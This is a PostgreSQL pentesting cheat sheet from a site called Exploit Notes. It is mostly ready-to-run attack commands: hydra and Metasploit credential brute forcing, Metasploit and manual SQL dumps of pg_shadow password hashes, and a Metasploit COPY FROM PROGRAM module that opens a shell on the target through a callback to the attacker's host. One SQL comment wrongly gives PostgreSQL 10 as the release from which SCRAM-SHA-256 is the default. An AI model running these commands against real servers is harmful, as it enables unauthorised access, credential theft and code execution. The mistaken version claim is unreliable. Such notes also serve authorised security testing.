Exploit Notes

PostgreSQL Pentesting

Last modified: 2023-03-09

Database

PostgreSQL is an open-source relational database management system. The default port is 5432/tcp.

Enumeration

# Note: pgsql-brute is a password-guessing script, not a passive probe. It is noisy, but it
# also confirms that the port speaks the PostgreSQL wire protocol.
nmap --script pgsql-brute -p 5432 <target-ip>

Brute Force Credentials

hydra -l username -P passwords.txt <target-ip> postgres
hydra -L usernames.txt -p password <target-ip> postgres

# Metasploit
msfconsole
msf> use auxiliary/scanner/postgres/postgres_login
msf> set rhosts <target-ip>
msf> run

Dump User Hashes

# Requires a superuser account: only superusers can read the password column of pg_shadow / pg_authid.
msfconsole
msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> set rhosts <target-ip>
msf> set username <username>
msf> set password <password>
msf> run
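The same hash dump done by hand from an authenticated psql session, as an added example (this is not code from the original notes or from the Metasploit module). The first query checks whether the current role is a superuser, because pg_shadow is only readable by superusers; the last query needs no special privilege and is useful for mapping roles when the hash dump fails.

```sql
-- Added example: manual equivalent of auxiliary/scanner/postgres/postgres_hashdump.
-- Run inside psql after connecting with the credentials you already have.

-- 1. Is the current role a superuser? pg_shadow is unreadable otherwise.
SELECT rolname, rolsuper, rolcanlogin
FROM pg_roles
WHERE rolname = current_user;

-- 2. Dump role names and stored password verifiers (superuser only).
--    'md5<hex>'            : md5(password || username) with an 'md5' prefix (default before PostgreSQL 10)
--    'SCRAM-SHA-256$...'   : salted, iterated SCRAM verifier (default from PostgreSQL 10 on),
--                            far slower to crack offline than the md5 form
SELECT usename, passwd, valuntil
FROM pg_shadow
WHERE passwd IS NOT NULL;

-- 3. Any login role can still enumerate roles and their privilege flags from pg_roles.
--    Superuser, CREATEROLE and CREATEDB accounts are the interesting targets.
SELECT rolname, rolsuper, rolcreaterole, rolcreatedb, rolreplication, rolcanlogin
FROM pg_roles
ORDER BY rolname;
```

If step 2 returns a permission error, the account is not a superuser; note the roles from step 3 and go back to the brute-force section with those names as the username list.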

Connect

Remote

# -W: Force a password prompt (use this when the server asks for password authentication)
psql -h <target-ip> -p <target-port> -d <database> -U <username> -W
# -w: Never prompt for a password; the connection fails if one is required
#     (handy for testing 'trust' authentication or a PGPASSWORD environment variable)
psql -h <target-ip> -p <target-port> -d <database> -U <username> -w

Commands in psql

# Print help
\?

# Print the version of PostgreSQL
select version();

# Display command history
\s

# List databases
\l

# Switch to the given database
\c <database_name>

# List tables
\dt

# Describe the table (columns, types, indexes, constraints)
\d <table_name>

# Get values in the table
select * from <table>;

# List all roles (users) with their attributes, e.g. Superuser, Create role, Create DB
\du

# Exit psql shell
\q

Get a Shell and Command Execution

# Requires PostgreSQL 9.3 or later and an account that is a superuser (or, on 11+, a member of
# pg_execute_server_program). The module abuses COPY ... FROM PROGRAM, so commands run as the OS
# user that owns the database server process (usually 'postgres'), not as root.
msfconsole
msf> use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
msf> set rhosts <target-ip>
msf> set lhost <local-ip>
msf> set tablename <table_name>
msf> set username <username>
msf> set password <password>
msf> run
# If a meterpreter session opens, drop to an OS shell on the target
shell
